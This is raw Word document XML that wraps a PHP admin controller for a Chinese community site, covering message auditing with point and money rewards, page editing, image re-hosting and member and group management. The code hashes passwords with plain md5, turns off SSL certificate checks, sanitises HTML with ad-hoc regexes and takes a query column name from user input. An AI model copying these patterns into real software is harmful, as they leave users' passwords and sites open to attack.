    <w:p w14:paraId="57EF7F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FDC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8E88C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C7313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75D11F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AF83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525E06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 ? input('id') : '0';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C316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input('type') ? input('type') : '0';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBE0A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['0' =&gt; '&lt;font color="#f00"&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>禁止</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;/font&gt;', '1' =&gt; '&lt;font color="#1ab394"&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;/font&gt;', '2' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>审核</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>', '3' =&gt; '&lt;font color="#f00"&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>拒绝</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;/font&gt;'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9D2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7ECD44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 = Db::name('message')-&gt;where('id', $id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D3C9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($aritlce['uid']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF28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 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2C4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管理员设置隐藏状态</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBD9F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($type == 3) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B992A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拒绝通过</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFE7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($type == 3) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172298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管理员设置审核状态</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25464A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A8E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E419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($aritlce['uid'] &amp;&amp; $type == 1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FAF58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DB::name('member_config')-&gt;where("name='articleAdd' or name='articleHide' or name='articleScore' or name='articleNum' or name='articleCode' or name='articleJingyan' or name='articleMoney'")-&gt;fetchSql(false)-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F3C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$articleAdd = $data['0']['text'];     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D2E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$articleHide = $data['1']['text'];    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347C4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$articleScore = $data['2']['text'];   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E577F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$articleNum = $data['3']['text'];     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBA7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$articleCode = $data['4']['text'];    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B26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$articleJingyan = $data['5']['text'];   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7694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$articleMoney = $data['6']['text'];   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1FC0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702682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($articleMoney) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1058D0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'money',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'data' =&gt; '+'])-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3AB7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(!$aritlcejiance) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79AE65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$articleMoney, 'money', '+');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3277A8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$aritlce['uid'])-&gt;setInc('money', $articleMoney);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337AA7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870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71F8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($articleScore) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02669C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'score',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'data' =&gt; '+'])-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359161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(!$aritlcejiance) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254A21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$articleScore, 'score', '+');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27EA17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$aritlce['id'])-&gt;setInc('score', $articleScore);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA1A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7BEDF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9BC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($articleJingyan) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323B1E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'jingyan',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'data' =&gt; '+'])-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2117F2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(!$articleJingyan) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED186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$articleJingyan, 'jingyan', '+');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3729D3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$this-&gt;member['id'])-&gt;setInc('jingyan', $articleJingyan);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AAF37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F466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151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_records($aritlce['uid'],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$aritlce['id'] . '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>审核通过</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3174A5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FDEF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Db::name('message')-&gt;where('id', $aritlce['id'])-&gt;setField('hide', $type);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42DAC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D335D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[$text[$type]];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169707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B10AA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r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>删除失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09657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CBBD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A31F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['GET</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>值错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADB64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B019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7DD98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r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>提交错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3885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6115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17B26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933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page()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56958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BB6F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Db::name('page')-&gt;order('id asc,des desc')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BF60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 $data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E7F7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3F0775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3C4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pageAdd()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506B1F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9EC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3D5A0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(request()-&gt;isAjax()) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425367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14A4B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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0F73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($post['title']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC5EA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 = Db::name('page')-&gt;where('title', $post['title'])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CA67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($titledb) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F9AD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 =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>文章标题已存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49792F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DFA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12D7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Db::name('page')-&gt;insert($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D8A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8E738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添加成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19817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5D58D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添加失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C99FF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AFB7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1C391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Db::name('page')-&gt;where('id', $id)-&gt;update($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54ECC3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1A073D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修改成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D705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DF5E5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修改失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6B9C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6D7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DA9A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B74A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764C2C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Db::name('page')-&gt;where('id', $id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63617B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($name) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDC90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 $name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01AC4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84FE4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'id</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>参数错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0C61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F82F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32A2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$this-&gt;fetch();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569D57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4454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15789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4F2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get($url, $json = false)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659883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F2A3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$arrContextOptions = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45764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"ssl" =&gt; [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665322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 =&gt; false,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4ED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"verify_peer_name" =&gt; false,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52117E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2035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C322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file_get_contents('http:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730572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($json) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33019C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json_decode($html, true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD03E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FBFA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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CE1C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230C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qiniu($url, $type = '')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A285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E2B0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(!$url) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548C95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3052CD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B090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57A7F3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'.jpg';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6147B9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99C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0152B4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5CE694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14E50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30D69A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33DF39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$bmgr = new BucketManager($auth);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A0A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4FF6D2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$key = md5($url . rand(11111, 999999)) . $type;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE946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$bmgr-&gt;fetch($url, $bucket, $key);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7247A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4241DF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7429C1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0F7A5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$key;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="379D73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672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6F21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_html_content($article)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D710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6A24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preg_match_all("/src=\"(.*?)\"/", $article, $img);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140A7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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700642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($img) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4117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($img[1] as $k =&gt; $v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B424C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$img_1 = $v;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49706F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$img_2 = _imgUrl() . $this-&gt;qiniu($img_1, 'message');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79611B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($img_1 &amp;&amp; $img_2) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D63B0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str_replace($img_1, $img_2, $article);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146C7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BF8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AFBA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8DEA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preg_replace("/(img_width.*?)\"(.*?)\"/si", "", $article);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367BC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preg_replace("/(img_height.*?)\"(.*?)\"/si", "", $article);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4503E6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preg_replace("/(onerror.*?)\"(.*?)\"/si", "", $article);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A859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preg_replace("/(inline.*?)\"(.*?)\"/si", "", $article);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7282DD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preg_replace("/&lt;(p.*?)&gt;/si", "&lt;p&gt;", $article); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216D40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preg_replace("/&lt;(\/?figure.*?)&gt;/si", "", $article); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7742E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preg_replace("/&lt;(\/?a.*?)&gt;/si", "", $article); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF523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preg_replace("/(data.*?)\"(.*?)\"/si", "", $article); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665801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preg_replace("/(width.*?)\"(.*?)\"/si", "", $article); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59381B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preg_replace("/(alt.*?)\"(.*?)\"/si", "", $article); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587887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preg_replace("/(style.*?)\"(.*?)\"/si", "", $article); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EDBC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$article;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156DD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2CAB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6B772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769EE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4901ED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6A135A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038A63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Member extends Common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F288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1C6AB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config(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA84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$name=Db::name('member_config')-&gt;where('type','member')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE69D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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3628A1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($name as $k =&gt; $v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD65E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$config[$v['name']]['name']=$v['name'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0544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$config[$v['name']]['title']=$v['title'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B24B3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$config[$v['name']]['content']=$v['content'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A01C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$config[$v['name']]['text']=$v['text'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2193A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B2F1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$this-&gt;assign('cfg',$config);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DC9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$member_groups=Db::name('member_groups')-&gt;order('jingyan asc,id asc')-&gt;cache(_cache('db'))-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012D8F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$member_groups2=Db::name('member_groups')-&gt;order('jingyan desc,id desc')-&gt;cache(_cache('db'))-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD9F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$this-&gt;assign('member_groups',$member_groups);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B0D8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$this-&gt;assign('member_groups2',$member_groups2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7783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6FDC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1B135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if(!$post['regmobile'] &amp;&amp; !$post['regemail'] &amp;&amp; !$post['reguser']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065D98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用户名、手机、邮箱，至少要开放一个</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC1D0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70C1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55BE41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($name as $k =&gt; $v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDAE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Db::name('member_config')-&gt;where('name',$v['name'])-&gt;setField('text',$post[$v['name']]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F10C1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D48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63C5F8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CDE24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1218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4371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C715E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1437A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58F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24C6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CE1B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560BC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1C48D6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$search_name=input('param.name');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315F71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$search_type=input('param.type');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3582C1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 &amp;&amp; $search_type){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743D51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$map[$search_type]  = ['like','%'.$search_name.'%'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6109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AD3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279889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EDF9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$map['hide']=['not in',0,1];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4178D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$data=Db::name('member')-&gt;order('id desc,update_time desc')-&gt;where($map)-&gt;paginate('',false,['query'=&gt;request()-&gt;param()]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550993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6B6D8F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65249D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48A8A0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82FDB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105D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21DC24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155E81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587A4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FC966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if(!$post['user'] &amp;&amp; !$post['email'] &amp;&amp; !$post['mobile']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7F27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账户、手机、邮箱最少填写</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>个</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050944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A65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$validate=validate('Member');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2321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if($validate-&gt;check($post)){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DCCA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if(!$id){   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403CBB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$post['password']=md5($post['password']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F4D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$post['update_time']=time(); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F83C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if($post['user']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2C93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$userdb=Db::name('member')-&gt;where('user',$post['user'])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2227D7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if($userdb){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D92D2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账户已存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349D60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862E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B08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if(!$post['password']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FAD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请填写密码</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12207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9FF7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$post['create_time']=time(); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE93D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$db=Db::name('member')-&gt;insert($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F5EB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54AD1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224CF9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E05CA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3F31D4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5A9E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122FC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$member=Db::name('member')-&gt;where('id',$id)-&gt;value('password');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DAA2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if(!$post['password']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12EA6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$post['password']=$member;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A7A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C0D0C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$post['password']=md5($post['password']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BAFD2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2AAE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$db=Db::name('member')-&gt;where('id',$id)-&gt;update($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6779DF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98DA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59B64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06553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0A4004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0BB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9BD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1C98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$data=["err"=&gt;$validate-&gt;getError()];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E21F6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F5F7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2157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B9124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$name=Db::name('member')-&gt;where('id',$id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3B8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08248D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7D44D4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4885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CD43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1F05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3531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14CBC5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72E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BCA38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D72F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groups(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553734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$data=Db::name('member_groups')-&gt;order('id asc')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D543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$this-&gt;assign('data',$data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8858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$this-&gt;fetch('groups');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B83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3B3B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0B734F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1BD6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ABC75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AE30A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$db=Db::name('member')-&gt;delete($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2316B2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8D38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271CB9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41107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6C68EA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FEFA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1DA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5D046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3EED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32894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6C825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6046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3882E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6A58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groupsAdd(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE443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2C0F35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E794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6EE9F2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1FFA9F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$titledb=Db::name('member_groups')-&gt;where('title',$post['title'])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC2DE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0AD927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分组名已存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BABC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D54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if($post['jingyan']=='' || $post['jingyan']==0){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D32A9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经验值必须填写</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8B3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903A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$db=Db::name('member_groups')-&gt;insert($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13221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F0CAB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44167F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E31A8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4222A5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6327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19A7A4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$db=Db::name('member_groups')-&gt;where('id',$id)-&gt;update($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4F2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BCBA7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3EF0A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0AE41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28227D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3D2C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EF2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029A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8F247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$name=Db::name('member_groups')-&gt;where('id',$id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A1C1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357E77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$this-&gt;assign('name',$name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FCCBA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C0BB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8CED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E50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420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66327C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DED8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52926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B115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groupsDel(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528BE7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C4469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47956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48BB79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$db=Db::name('member_groups')-&gt;delete($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3655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E878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40D05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33D1D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2AA65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B99B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4127A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3FBCA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8523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7B6B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1832D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7CF0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423C6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B73BE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audit(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52667D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$data=Db::name('member')-&gt;order('id desc,update_time desc')-&gt;where(['hide'=&gt;2])-&gt;whereOr('hide',3)-&gt;paginate('',false,['query'=&gt;request()-&gt;param()]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40DD76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B2A14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686D2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3E984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1E716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6827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3BBB18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3B6B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 ? input('id'): '0';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B8F1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 ? input('type') : '0';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C18A4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$text=['0'=&gt;'&lt;font color="#f00"&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>禁止</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;/font&gt;','1'=&gt;'&lt;font color="#1ab394"&gt;</w:t>
      </w:r>
